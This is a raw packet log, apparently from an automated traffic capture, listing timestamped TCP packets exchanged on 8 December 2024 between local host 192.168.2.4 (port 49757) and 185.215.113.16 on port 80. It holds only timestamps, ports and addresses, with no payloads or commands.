Dec 8, 2024 19:52:38.609205008 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.609246969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.609302998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.609337091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.610266924 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.610318899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.610336065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.610373020 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.611083031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.611140966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.744074106 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.744138956 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.744215012 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.744255066 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.744401932 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.744448900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.744461060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.744507074 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.745174885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.745246887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.745398045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.745446920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.746115923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.746164083 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.746270895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.746316910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.746717930 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.746766090 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.746845007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.746887922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.747756958 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.747805119 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.747852087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.747896910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.748691082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.748738050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.748816013 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.748866081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.749512911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.749557972 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.749607086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.749653101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.750422001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.750468016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.750505924 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.750551939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.751110077 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.751156092 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.751173973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.751216888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.751941919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.751988888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.752072096 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.752119064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.753011942 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.753060102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.753130913 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.753177881 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.753885031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.753931046 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.753956079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.754004002 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.754753113 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.754802942 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.754933119 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.754981995 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.755666971 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.755713940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.755846977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.755893946 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.756584883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.756639957 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.756680012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.756730080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.757481098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.757528067 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.757606030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.757663965 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.758523941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.758570910 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.758599997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.758647919 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.759457111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.759507895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.759586096 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.759633064 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.760483027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.760540009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.760561943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.760612965 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.761199951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.761214018 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.761245966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.761265993 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.762089014 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.762136936 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.762563944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.762612104 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.763015032 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.763063908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.763120890 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.763165951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.763951063 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.763997078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.764082909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.764126062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.764873981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.764921904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.765007973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.765053034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.765775919 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.765825033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.765853882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.765897989 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.766761065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.766807079 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.766843081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.766886950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.767733097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.767781019 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.767798901 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.767844915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.768587112 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.768635988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.768711090 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.768757105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.769527912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.769577026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.769716024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.769763947 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.770458937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.770514011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.770514011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.770550013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.771372080 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.771423101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.771461010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.771498919 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.772455931 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.772522926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.772558928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.772608995 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.773377895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.773418903 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.773426056 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.773456097 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.774224997 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.774280071 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.774281025 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.774326086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.775103092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.775152922 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.775172949 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.775218964 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.775990963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.776066065 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.776103020 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.776149988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.776870012 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.776918888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.777057886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.777103901 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.777823925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.777872086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.777915001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.777966022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.778728962 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.778875113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.778887987 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.778934956 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.779650927 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.779700994 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.779747963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.779797077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.780673981 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.780721903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.780844927 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.780889988 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.781631947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.781680107 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.781713009 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.781760931 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.782428980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.782479048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.782628059 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.782680035 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.783360004 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.783407927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.783531904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.783572912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.784497976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.784569025 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.784684896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.784739971 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.785269976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.785334110 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.785414934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.785461903 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.786288023 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.786372900 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.786432028 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.786482096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.787010908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.787058115 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.787095070 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.787144899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.787941933 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.788002014 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.788039923 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.788089991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.788851976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.788902998 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.788976908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.789020061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.789786100 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.789840937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.789900064 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.789943933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.790767908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.790813923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.790854931 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.790899992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.791641951 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.791692019 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.791754961 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.791799068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.936054945 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.936089039 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.936172962 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.936180115 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.936228991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.936317921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.936372042 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.937143087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.937196016 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.937253952 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.937300920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.938043118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.938096046 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.938103914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.938153028 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.938754082 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.938806057 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.939003944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.939066887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.939706087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.939758062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.939907074 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.939955950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.940577984 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.940632105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.940649986 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.940699100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.941485882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.941538095 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.941600084 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.941652060 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.942399979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.942450047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.942460060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.942506075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.943324089 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.943380117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.943428993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.943476915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.944242954 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.944293022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.944370031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.944417000 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.945185900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.945238113 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.945354939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.945404053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.946144104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.946213007 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.946214914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.946258068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.947144985 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.947196960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.947227001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.947271109 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.948060989 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.948110104 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.948168993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.948211908 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.959647894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959690094 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959703922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959718943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959731102 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.959741116 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959762096 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.959786892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959800005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.959811926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.959821939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.959855080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.959992886 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960007906 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960024118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960043907 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960047960 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960057974 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960058928 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960252047 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960268021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960282087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960282087 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960284948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960298061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960300922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960315943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960316896 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960333109 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960338116 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960366011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960517883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960534096 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960563898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960578918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960588932 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960596085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960611105 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960628033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960633039 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960647106 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960665941 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960684061 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960704088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960746050 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960835934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.960889101 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.960972071 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.961019039 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.961333990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.961381912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.962356091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.962407112 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:38.962526083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:38.962582111 CET	49757	80	192.168.2.4	185.215.113.16
